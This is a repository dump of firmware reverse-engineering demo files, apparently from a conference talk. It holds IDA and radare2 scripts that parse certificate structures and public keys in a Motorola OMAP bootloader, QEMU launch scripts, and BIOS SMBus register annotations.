| 253 | for c in comments : 254 | if c.text != "" : 255 | print("\"CCa {0} {1}\"".format(c.address, c.text)) 256 | 257 | # ---------------------------------------------------------------------- 258 | 259 | def idc_parse(idc): 260 | enums_parse(idc) 261 | structs_parse(idc) 262 | functions_parse(idc) 263 | comments_parse(idc) 264 | generate_r2() 265 | 266 | if __name__ == "__main__": 267 | if len(sys.argv) < 2: 268 | print("Usage: idc2r.py input.idc > output.r2") 269 | sys.exit(1) 270 | 271 | #print(sys.argv[1]) 272 | idc_file = open(sys.argv[1], "r") 273 | idc = idc_file.read() 274 | idc_parse(idc) 275 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/mbmloader-1.raw: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/motorola-crypto.py: -------------------------------------------------------------------------------- 1 | import idaapi 2 | import idautils 3 | import idc 4 | 5 | import math 6 | from M2Crypto import BIO, RSA, EVP 7 | from pyasn1.codec.der import decoder 8 | 9 | # Key generation: 10 | # openssl genrsa -out rsatest.key 1024 11 | # openssl rsa -in rsatest.key -pubout -out rsatest.pub 12 | # openssl rsa -modulus -in rsatest.key 13 | 14 | def big_endian(n): 15 | s = '%x' % n 16 | if len(s) & 1: 17 | s = '0' + s 18 | return s.decode('hex') 19 | 20 | def construct_public_key(public_exponent, modulus, key_size): 21 | 22 | # N_PREFIX depends on key length 23 | #key_size = math.trunc(math.log(modulus, 2)) + 1 24 | 25 | if key_size == 256 : 26 | N_PREFIX = '\x00\x00\x00\x00' 27 | elif key_size == 512 : 28 | N_PREFIX = '\x00\x00\x00A\x00' 29 | elif key_size == 1024 : 30 | N_PREFIX = '\x00\x00\x00\x81\x00' 31 | elif (key_size == 2048) | (key_size == 2047) : 32 | N_PREFIX = '\x00\x00\x01\x01\x00' 33 | elif key_size == 4096 : 34 | N_PREFIX = '\x00\x00\x02\x01\x00' 35 | else : 36 | N_PREFIX = '\x00\x00\x00\x00' 37 | 38 | # E_PREFIX depends on E value 39 | 40 | if public_exponent == 65537 : 41 | E_PREFIX = '\x00\x00\x00\x03' 42 | elif public_exponent == 3 : 43 | E_PREFIX = '\x00\x00\x00\x01' 44 | else : 45 | E_PREFIX = '\x00\x00\x00\x00' 46 | 47 | e = E_PREFIX + big_endian(public_exponent) 48 | n = N_PREFIX + big_endian(modulus) 49 | key = RSA.new_pub_key((e,n)) 50 | return key 51 | 52 | # 1. Found all certificates and digests in file 53 | # 2. Try recognize them with the structure and ASN1 parser 54 | # 3. List them and provide address 55 | # 4. Mark them as structures 56 | # 5. Make PEM and DER formats of all of them 57 | 58 | def parse_structures(): 59 | 60 | # Searching structures, and if not exists - creating them 61 | 62 | # RSA KEY structure 63 | 64 | rsa_key = idc.GetStrucIdByName("rsa_key") 65 | rsa_key_str = """ struct rsa_key { 66 | long key_id; 67 | long key_type; 68 | long key_rights; 69 | long modul_length; 70 | long e_value; 71 | char modul[256]; 72 | }; """ 73 | if rsa_key == -1: 74 | rsa_key = idc.AddStrucEx(-1, "rsa_key", 0) 75 | idc.AddStrucMember(rsa_key, "key_id", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 76 | idc.AddStrucMember(rsa_key, "key_type", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 77 | idc.AddStrucMember(rsa_key, "key_rights", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 78 | idc.AddStrucMember(rsa_key, "modul_length", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 79 | idc.AddStrucMember(rsa_key, "e_value", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 80 | idc.AddStrucMember(rsa_key, "modul", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 256) 81 | 82 | # RSA ASN1 DIGEST structure 83 | 84 | rsa_asn1_digest = idc.GetStrucIdByName("rsa_asn1_digest") 85 | rsa_asn1_digest_str = """ struct rsa_asn1_digest { 86 | char signer_info[16]; 87 | long signature_info; 88 | long key_id; 89 | char digest[256]; 90 | }; """ 91 | if rsa_asn1_digest == -1: 92 | rsa_asn1_digest = idc.AddStrucEx(-1, "rsa_asn1_digest", 0) 93 | idc.AddStrucMember(rsa_asn1_digest, "signer_info", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 16) 94 | idc.AddStrucMember(rsa_asn1_digest, "signature_info", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 95 | idc.AddStrucMember(rsa_asn1_digest, "key_id", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 96 | idc.AddStrucMember(rsa_asn1_digest, "digest", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 256) 97 | 98 | # Cert PK - Public Keys structure 99 | 100 | certpk_struct = idc.GetStrucIdByName("Cert_Public") 101 | certpk_str = """ struct certpk { 102 | char cert_mark[8]; 103 | long cert_version; 104 | long cert_type; 105 | long minver_pk; 106 | long minver_ppa; 107 | long minver_rd1; 108 | long minver_rd2; 109 | long minver_isw; 110 | long minver_ki; 111 | long minver_pau; 112 | long minver_pas; 113 | long unkn1; 114 | struct { 115 | long key_id; 116 | long key_type; 117 | long key_rights; 118 | long modul_length; 119 | long e_value; 120 | char modul[256]; 121 | } root_key; 122 | long keys_active; 123 | struct { 124 | long key_id; 125 | long key_type; 126 | long key_rights; 127 | long modul_length; 128 | long e_value; 129 | char modul[256]; 130 | } key_02; 131 | struct { 132 | long key_id; 133 | long key_type; 134 | long key_rights; 135 | long modul_length; 136 | long e_value; 137 | char modul[256]; 138 | } key_03; 139 | struct { 140 | long key_id; 141 | long key_type; 142 | long key_rights; 143 | long modul_length; 144 | long e_value; 145 | char modul[256]; 146 | } key_04; 147 | struct { 148 | long key_id; 149 | long key_type; 150 | long key_rights; 151 | long modul_length; 152 | long e_value; 153 | char modul[256]; 154 | } key_05; 155 | struct { 156 | long key_id; 157 | long key_type; 158 | long key_rights; 159 | long modul_length; 160 | long e_value; 161 | char modul[256]; 162 | } key_06; 163 | struct { 164 | long key_id; 165 | long key_type; 166 | long key_rights; 167 | long modul_length; 168 | long e_value; 169 | char modul[256]; 170 | } key_07; 171 | long rights; 172 | long msv_mask; 173 | char zero_hole_2[120]; 174 | struct { 175 | char signer_info[16]; 176 | long signature_info; 177 | long key_id; 178 | char digest[256]; 179 | } digest; 180 | };""" 181 | if certpk_struct == -1: 182 | certpk_struct = idc.AddStrucEx(-1, "Cert_Public", 0) 183 | idc.AddStrucMember(certpk_struct, "cert_mark", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 8) 184 | idc.AddStrucMember(certpk_struct, "cert_version", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 185 | idc.AddStrucMember(certpk_struct, "cert_type", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 186 | idc.AddStrucMember(certpk_struct, "minver_pk", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 187 | idc.AddStrucMember(certpk_struct, "minver_ppa", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 188 | idc.AddStrucMember(certpk_struct, "minver_rd1", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 189 | idc.AddStrucMember(certpk_struct, "minver_rd2", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 190 | idc.AddStrucMember(certpk_struct, "minver_isw", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 191 | idc.AddStrucMember(certpk_struct, "minver_ki", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 192 | idc.AddStrucMember(certpk_struct, "minver_pau", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 193 | idc.AddStrucMember(certpk_struct, "minver_pas", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 194 | idc.AddStrucMember(certpk_struct, "unkn1", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 195 | idc.AddStrucMember(certpk_struct, "root_key", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 196 | idc.AddStrucMember(certpk_struct, "keys_active", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 197 | idc.AddStrucMember(certpk_struct, "key_02", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 198 | idc.AddStrucMember(certpk_struct, "key_03", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 199 | idc.AddStrucMember(certpk_struct, "key_04", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 200 | idc.AddStrucMember(certpk_struct, "key_05", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 201 | idc.AddStrucMember(certpk_struct, "key_06", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 202 | idc.AddStrucMember(certpk_struct, "key_07", -1, 0x60000400, rsa_key, idc.GetStrucSize(rsa_key)) 203 | idc.AddStrucMember(certpk_struct, "rights", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 204 | idc.AddStrucMember(certpk_struct, "msv_mask", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 205 | idc.AddStrucMember(certpk_struct, "zero_hole_2", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 120) 206 | idc.AddStrucMember(certpk_struct, "digest", -1, 0x60000400, rsa_asn1_digest, idc.GetStrucSize(rsa_asn1_digest)) 207 | 208 | # CertPPA - Primary Protected Application Certificate structure 209 | 210 | certppa_struct = idc.GetStrucIdByName("Cert_Primary") 211 | certppa_str = """ struct certppa { 212 | char cert_mark[8]; 213 | long cert_version; 214 | long cert_type; 215 | long minver_src; 216 | long minver_pk; 217 | long minver_ppa; 218 | long minver_rd1; 219 | long minver_rd2; 220 | long minver_isw; 221 | struct { 222 | int image_offset; 223 | int image_size; 224 | int data_byte[5]; 225 | } images[4]; 226 | char zero_hole[128]; 227 | struct { 228 | char signer_info[16]; 229 | long signature_info; 230 | long key_id; 231 | char digest[256]; 232 | } digest; 233 | };""" 234 | if certppa_struct == -1: 235 | certppa_struct = idc.AddStrucEx(-1, "Cert_Primary", 0) 236 | idc.AddStrucMember(certppa_struct, "cert_mark", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 8) 237 | idc.AddStrucMember(certppa_struct, "cert_version", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 238 | idc.AddStrucMember(certppa_struct, "cert_type", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 239 | idc.AddStrucMember(certppa_struct, "minver_src", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 240 | idc.AddStrucMember(certppa_struct, "minver_pk", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 241 | idc.AddStrucMember(certppa_struct, "minver_ppa", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 242 | idc.AddStrucMember(certppa_struct, "minver_rd1", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 243 | idc.AddStrucMember(certppa_struct, "minver_rd2", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 244 | idc.AddStrucMember(certppa_struct, "minver_isw", -1, (FF_DWRD|FF_DATA)&0xFFFFFFFF, -1, 4) 245 | idc.AddStrucMember(certppa_struct, "images", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 21) 246 | idc.AddStrucMember(certppa_struct, "zero_hole", -1, (FF_BYTE|FF_DATA)&0xFFFFFFFF, -1, 128) 247 | idc.AddStrucMember(certppa_struct, "digest", -1, 0x60000400, rsa_asn1_digest, idc.GetStrucSize(rsa_asn1_digest)) 248 | 249 | # CertISW - Initial Software Certificate structure 250 | 251 | certisw_struct = idc.GetStrucIdByName("Cert_ISW") 252 | certisw_str = """struct certisw { 253 | char cert_mark[8]; 254 | int cert_version; 255 | int cert_type; 256 | int minver_src; 257 | int minver_pk; 258 | int minver_ppa; 259 | int minver_rd1; 260 | int minver_rd2; 261 | int minver_isw; 262 | int watchdog_param; 263 | int use_DMA; 264 | int active_images; 265 | struct { 266 | int image_offset; 267 | int image_size; 268 | int data_byte[5]; 269 | } images[4]; 270 | int magic_1; 271 | int reg_bitfield; 272 | struct { 273 | int reg_address; 274 | int reg_value; 275 | } reg_table[32]; 276 | int reg_type_01; 277 | int reg_type_02; 278 | int entry_point_offset; 279 | int zero_hole[32]; 280 | struct { 281 | char signer_info[16]; 282 | long signature_info; 283 | long key_id; 284 | char digest[256]; 285 | } digest; 286 | };""" 287 | 288 | mbmloader_hdr_str = """struct mbmloader_head { 289 | void *entry_point; 290 | int anonymous_0; 291 | void *anonymous_1; 292 | void *anonymous_2; 293 | void *anonymous_3; 294 | void *anonymous_4; 295 | int anonymous_5; 296 | int field_1C; 297 | void *anonymous_7; 298 | int field_24; 299 | void *anonymous_8; 300 | int anonymous_9; 301 | int ruler[4]; 302 | char srk_part_1[128]; 303 | int srk_1; 304 | void *srk_1_pointer; 305 | int field_C8; 306 | int field_CC; 307 | char srk_part_2[128]; 308 | int srk_2; 309 | void *srk_2_pointer; 310 | int field_158; 311 | int field_15C; 312 | char sha_160_hash[20]; 313 | };""" 314 | 315 | # Searching main structures marks 316 | 317 | start = idc.MinEA() 318 | stop = idc.MaxEA() 319 | certpk_addr = idaapi.find_binary(start, stop, "43 65 72 74 50 4B 5F 00", 0, 0) # "CertPK_" string 320 | print "Found CertPK at 0x%x" % certpk_addr 321 | certppa_addr = idaapi.find_binary(start, stop, "43 65 72 74 50 50 41 00", 0, 0) # "CertPPA" string 322 | print "Found CertPPA at 0x%x" % certppa_addr 323 | certisw_addr = idaapi.find_binary(start, stop, "43 65 72 74 49 53 57 00", 0, 0) # "CertISW" string 324 | print "Found CertISW at 0x%x" % certisw_addr 325 | 326 | # Apply structure types on Cert* addresses 327 | 328 | # Read Structures from such data 329 | 330 | # If type is not parsed already, then... 331 | if idc.ParseTypes("certpk;", idc.PT_SILENT) != 0: 332 | # ...define the type 333 | idc.ParseTypes(certpk_str, idc.PT_SILENT) 334 | 335 | if idc.ParseTypes("certppa;", idc.PT_SILENT) != 0: 336 | idc.ParseTypes(certppa_str, idc.PT_SILENT) 337 | 338 | if idc.ParseTypes("certisw;", idc.PT_SILENT) != 0: 339 | idc.ParseTypes(certisw_str, idc.PT_SILENT) 340 | 341 | certpk_ = idaapi.Appcall.typedobj("certpk;") 342 | certpk_read, certpk = certpk_.retrieve(idaapi.get_many_bytes(certpk_addr, certpk_.size)) 343 | 344 | certppa_ = idaapi.Appcall.typedobj("certppa;") 345 | certppa_read, certppa = certppa_.retrieve(idaapi.get_many_bytes(certppa_addr, certppa_.size)) 346 | 347 | certisw_ = idaapi.Appcall.typedobj("certisw;") 348 | certisw_read, certisw = certisw_.retrieve(idaapi.get_many_bytes(certisw_addr, certisw_.size)) 349 | 350 | # Make PEM keys 351 | if certpk_read == 1 : 352 | root_key = construct_public_key(certpk.root_key.e_value, int(certpk.root_key.modul[0:certpk.root_key.modul_length].encode("hex"), 16), certpk.root_key.modul_length * 8) 353 | root_key.save_key("root_key.pem") 354 | 355 | # TODO: add automatic export of all ACTIVE keys from certpk.active_keys 356 | pk_02 = construct_public_key(certpk.key_02.e_value, int(certpk.key_02.modul[0:certpk.key_02.modul_length].encode("hex"), 16), certpk.key_02.modul_length * 8) 357 | pk_02.save_key("pk_02.pem") 358 | pk_03 = construct_public_key(certpk.key_03.e_value, int(certpk.key_03.modul[0:certpk.key_03.modul_length].encode("hex"), 16), certpk.key_03.modul_length * 8) 359 | pk_03.save_key("pk_03.pem") 360 | pk_04 = construct_public_key(certpk.key_04.e_value, int(certpk.key_04.modul[0:certpk.key_04.modul_length].encode("hex"), 16), certpk.key_04.modul_length * 8) 361 | pk_04.save_key("pk_04.pem") 362 | else : 363 | print "CertPK read fail!" 364 | 365 | # Verify digests 366 | if (certpk_read == 1) & (certppa_read == 1) & (certisw_read == 1) : 367 | certpk_digest = certpk.digest.digest.encode("hex") 368 | certppa_digest = certppa.digest.digest.encode("hex") 369 | certisw_digest = certisw.digest.digest.encode("hex") 370 | # pk_03.public_decrypt(certisw_digest, 1) 371 | # pk_03.verify(idaapi.get_many_bytes(certisw_addr, certisw_.size), certisw_digest, "sha1") 372 | # decoder.decode(certpk.digest.signer_info, ) 373 | print "CertPK signer info: %s " % certpk.digest.signer_info.encode("hex") 374 | print "CertPK digest: %s " % certpk.digest.digest.encode("hex") 375 | print "CertPPA signer info: %s " % certppa.digest.signer_info.encode("hex") 376 | print "CertPPA digest: %s " % certppa.digest.digest.encode("hex") 377 | print "CertISW signer info: %s " % certisw.digest.signer_info.encode("hex") 378 | print "CertISW digest: %s " % certisw.digest.digest.encode("hex") 379 | else : 380 | print "Certs processing fail!" 381 | 382 | # TODO: Parse rights of the keys 383 | # TODO: Parse ASN1 from digests 384 | 385 | # Processing Images 386 | i = 0 387 | while i < 4 : 388 | print "images type %s " % type (certppa.images) 389 | if certppa.images[i].image_offset != 0 : 390 | print "Found PPA image at %x offset " % certppa.images[i].image_offset 391 | if certisw.images[i].image_offset != 0 : 392 | print "Found ISW image at %x offset " % certisw.images[i].image_offset 393 | i += 1 394 | 395 | # image start at certppa mark address + certppa.images[i].image_offset 396 | 397 | 398 | # Script body 399 | 400 | start = idc.MinEA() 401 | stop = idc.MaxEA() 402 | version_addr = idaapi.find_binary(start, stop, "43 65 72 74 49 53 57 00", 0, 0) + 0x79e # "CertISW" string 403 | version_minor = idaapi.get_byte(version_addr) 404 | version_major = idaapi.get_byte(version_addr + 1) 405 | print "MBM loader Major Version: %x " % version_major 406 | print "MBM loader Minor Version: %x " % version_minor 407 | parse_structures() 408 | 409 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom.idc: -------------------------------------------------------------------------------- 1 | #include 2 | // Relocate one segment 3 | static SegCopy(src, dest, size) 4 | { 5 | auto ea_src, ea_dest, hi_limit; 6 | hi_limit = src + size; 7 | ea_dest = dest; 8 | for(ea_src = src; ea_src < hi_limit ; ea_src = ea_src + 4 ) 9 | { 10 | PatchDword( ea_dest, Dword(ea_src)); 11 | ea_dest = ea_dest + 4; 12 | } 13 | Message("segment copy finished(inside SegCopy function)...\n"); 14 | } 15 | 16 | static main() 17 | { 18 | Message("creating target segment(inside entry point function main)...\n"); 19 | AddSeg(0x00014000, 0x0001C000, 0x00000000, 0, 0, 0); 20 | RenameSeg(0x00014000, "ROM_ORIG"); // Give a new name to the segment. 21 | SegCopy(0x40014000, 0x00014000, 0x8000); 22 | } 23 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom.r2: -------------------------------------------------------------------------------- 1 | S 0 0x14000 0x8000 0x8000 explace rwx 2 | S 0 0x40014000 0x8000 0x8000 memplace rwx 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.idb -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo1_arm_boot/omap3430_boot_rom_14.57.lst -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/omap_3430.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo1_arm_boot/omap_3430.bin -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/run_qemu.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | qemu-system-arm -s -S -M milestone -m 256 -L . -bios omap_3430.bin -mtdblock mbmloader-1.raw -d in_asm,cpu,exec -nographic 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/run_r2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | r2 -a arm.gnu -b 32 -e io.va=true omap_3430.bin 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_legacy/asrock_p4i65g.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_legacy/asrock_p4i65g.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_legacy/asrock_p4i65g.h: -------------------------------------------------------------------------------- 1 | /* 2 | This file has been generated by IDA. 3 | It contains local type definitions from 4 | /home/xvilka/RE/hw/asrockp4i65gv/asrockp4i65g.idb 5 | */ 6 | 7 | /* 1 */ 8 | enum CPU_MSRS 9 | { 10 | IA32_TIME_STAMP_COUNTER = 0x10, 11 | IA32_PLATFORM_ID = 0x17, 12 | MSR_EBC_FREQUENCY_ID = 0x2C, 13 | IA32_BIOS_UPDT_TRIG = 0x79, 14 | IA32_BIOS_SIGN_ID = 0x8B, 15 | IA32_PERF_STATUS = 0x198, 16 | IA32_PERF_CTL = 0x199, 17 | IA32_MISC_ENABLE = 0x1A0, 18 | MSR_PLATFORM_BRV = 0x1A1, 19 | IA32_MTRR_PHYSBASE0 = 0x200, 20 | IA32_MTRR_PHYSMASK0 = 0x201, 21 | IA32_MTRR_PHYSMASK7 = 0x20F, 22 | IA32_MTRR_FIX64K_00000 = 0x250, 23 | IA32_MTRR_FIX16K_80000 = 0x258, 24 | IA32_MTRR_FIX16K_A0000 = 0x259, 25 | IA32_MTRR_FIX4K_C0000 = 0x268, 26 | IA32_MTRR_FIX4K_C8000 = 0x269, 27 | IA32_MTRR_FIX4K_D0000 = 0x26A, 28 | IA32_MTRR_FIX4K_D8000 = 0x26B, 29 | IA32_MTRR_FIX4K_E0000 = 0x26C, 30 | IA32_MTRR_FIX4K_E8000 = 0x26D, 31 | IA32_MTRR_FIX4K_F0000 = 0x26E, 32 | IA32_MTRR_FIX4K_F8000 = 0x26F, 33 | IA32_MTRR_DEF_TYPE = 0x2FF, 34 | }; 35 | 36 | /* 2 */ 37 | enum SMBus 38 | { 39 | SMBUS_HST_STS = 0x400, 40 | SMBUS_HST_CNT = 0x402, 41 | SMBUS_HST_CMD = 0x403, 42 | SMBUS_XMIT_SLVA = 0x404, 43 | SMBUS_HST_D0 = 0x405, 44 | SMBUS_HST_D1 = 0x406, 45 | }; 46 | 47 | /* 3 */ 48 | struct PCI_reg_mask 49 | { 50 | char reg_address; 51 | char disable_mask; 52 | char enable_mask; 53 | }; 54 | 55 | /* 5 */ 56 | struct SMBus_reg 57 | { 58 | char field_0; 59 | char field_1; 60 | }; 61 | 62 | /* 6 */ 63 | struct PCI_reg_masks 64 | { 65 | char pci_reg; 66 | short mask; 67 | }; 68 | 69 | /* 7 */ 70 | enum GPIO_registers 71 | { 72 | GPIO_USE_SEL = 0x480, 73 | GP_IO_SEL = 0x484, 74 | GP_LVL = 0x48C, 75 | GPO_TTL = 0x494, 76 | GPO_BLINK = 0x498, 77 | GPI_INV = 0x4AC, 78 | GPIO_USE_SEL2 = 0x4B0, 79 | GP_IO_SEL2 = 0x4B4, 80 | GP_LVL2 = 0x4B8, 81 | }; 82 | 83 | /* 8 */ 84 | struct SIO_reg_mask 85 | { 86 | char reg_address; 87 | char disable_mask; 88 | char enable_mask; 89 | }; 90 | 91 | /* 9 */ 92 | 93 | 94 | /* End of file */ 95 | -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_legacy/asrock_p4i65g.r2: -------------------------------------------------------------------------------- 1 | af+ 0xf000:0x5786 8 SMBus_ICH5_Reg_Write_Byte_SL 2 | af+ 0xf000:0x578e 8 SMBus_ICH5_Reg_Read_Byte_SL 3 | "CCa 0xf000:0x5786 void SMBus_ICH5_Reg_Write_Byte_SL(uint8_t reg, uint8_t value);" 4 | "CCa 0xf000:0x578e void SMBus_ICH5_Reg_Read_Byte_SL(uint8_t reg);" 5 | 6 | "CCa 0xf000:0x574d value = 0xD3; reg = 0x4; // XMIT_SLVA - Transmit Slave Address" 7 | "CCa 0xf000:0x575b reg = 0x3; // HST_CMD - Host Command" 8 | "CCa 0xf000:0x5762 value = 0x48; reg = 0x2; // HST_CNT - Host Control, value [6] - Start transmission, [3] - Byte Data mode" 9 | af+ 0xf000:0x574d 57 SMBus_Read_Byte_SL 10 | f. SMB_Write_CMD @ 0xf000:0x5755 11 | f. SMB_Start_CMD @ 0xf000:0x5762 12 | f. SMB_Read_Data @ 0xf000:0x5779 13 | f. SMB_Wait @ 0xf000:0x576d 14 | 15 | "CCa 0xf000:0x56e0 value = 0xD2; reg = 0x4; // XMIT_SLVA - Transmit Slave Address" 16 | "CCa 0xf000:0x56ed value" 17 | "CCa 0xf000:0x56ef reg = 0x3; // HST_CMD - Host Command" 18 | "CCa 0xf000:0x56f7 value" 19 | "CCa 0xf000:0x56fb reg = 0x5; // HST_D0 - Host Data 0" 20 | "CCa 0xf000:0x5703 value = 0x48; reg = 0x2; // HST_CNT - Host Control, value [6] - Start transmission, [3] - Byte Data mode" 21 | af+ 0xf000:0x56e0 64 SMBus_Write_Byte_SL 22 | f. SMB_Write_CMD @ 0xf000:0x56e9 23 | f. SMB_Write_Data @ 0xf000:0x56f7 24 | f. SMB_Start_CMD @ 0xf000:0x5703 25 | f. SMB_Wait @ 0xf000:0x570e 26 | 27 | af+ 0xf000:0x5720 45 SMBus_Read_Block_SL 28 | af+ 0xf000:0x56b1 47 SMBus_Write_Block_SL 29 | 30 | af+ 0xf000:0x47a3 7 SMBus_ICH5_Reg_Write_Byte 31 | af+ 0xf000:0x479c 7 SMBus_ICH5_Reg_Read_Byte 32 | "CCa 0xf000:0x47a3 void SMBus_ICH5_Reg_Write_Byte(uint8_t reg, uint8_t value);" 33 | "CCa 0xf000:0x479c void SMBus_ICH5_Reg_Read_Byte(uint8_t reg);" 34 | 35 | "CCa 0xf000:0x47ad HST_STS - Host Status" 36 | "CCa 0xf000:0x47b6 [3] - BUS_ERR; [2] - DEV_ERR; [1] - INTR (command termination); [0] - HOST_BUSY;" 37 | af+ 0xf000:47aa 24 SMBus_Host_Transaction_Complete_Errors_Check 38 | f. wait @ 0xf000:0x47ad 39 | f. return_clear_carry @ 0xf000:0x47c0 40 | 41 | "CCa 0xf000:0x47c5 HST_STS - Host Status" 42 | "CCa 0xf000:0x47cb [1] - INTR (1 - successfull completion)" 43 | af+ 0xf000:0x47c2 19 SMBus_Host_Transaction_Complete_Check 44 | f. wait @ 0xf000:0x47c5 45 | f. return_clear_carry @ 0xf000:0x47d3 46 | 47 | Cd 2 @ 0xf000:0x46e0 48 | Cd 2 @ 0xf000:0x46f2 49 | Cd 2 @ 0xf000:0x4700 50 | Cd 2 @ 0xf000:0x470c 51 | Cd 2 @ 0xf000:0x4714 52 | Cd 2 @ 0xf000:0x4722 53 | Cd 2 @ 0xf000:0x472b 54 | "CCa 0xf000:0x46e8 reg = 0x4; // XMIT_SLVA - Transmit Slave Address" 55 | "CCa 0xf000:0x46f8 reg = 0x3; // HST_CMD - Host Command" 56 | "CCa 0xf000:0x4702 value = 0x48; reg = 0x2; // HST_CNT - Host Control, value [6] - Start transmission, [3] - Byte Data mode" 57 | "CCa 0xf000:0x4716 SMBus timeout or error" 58 | "CCa 0xf000:0x4724 reg = 0x5; // HST_D0 - Host Data 0" 59 | af+ 0xf000:0x46d2 100 SMBus_Read_Byte 60 | f. SMB_Write_Address @ 0xf000:0x46e0 61 | f. SMB_Write_CMD @ 0xf000:0x46f4 62 | f. SMB_Start_CMD @ 0xf000:0x4702 63 | f. SMB_Wati_Transaction_Completion @ 0xf000:0x470e 64 | f. SMB_Host_Reset @ 0xf000:0x4716 65 | f. SMB_Read_DATA0 @ 0xf000:0x4724 66 | f. return_clear_carry @ 0xf000:0x472d 67 | f. return @ 0xf000:0x4732 68 | 69 | af+ 0xf000:0x4736 102 SMBus_Write_Byte 70 | 71 | af+ 0xf000:0x5c93 51 SIO_Init 72 | f. read_loop @ 0xf000:0x5c9b 73 | f. next_item @ 0xf000:0x5ca3 74 | f. write_loop @ 0xf000:0x5caa 75 | f. return @ 0xf000:0x5cbf 76 | 77 | s 0xf000:0x5c93 78 | -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/Asus_937_12sec_dmienbg64.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/Asus_937_12sec_dmienbg64.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/CpuPei.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/CpuPei.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/NTFS.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/NTFS.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/PchInit.pe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/PchInit.pe -------------------------------------------------------------------------------- 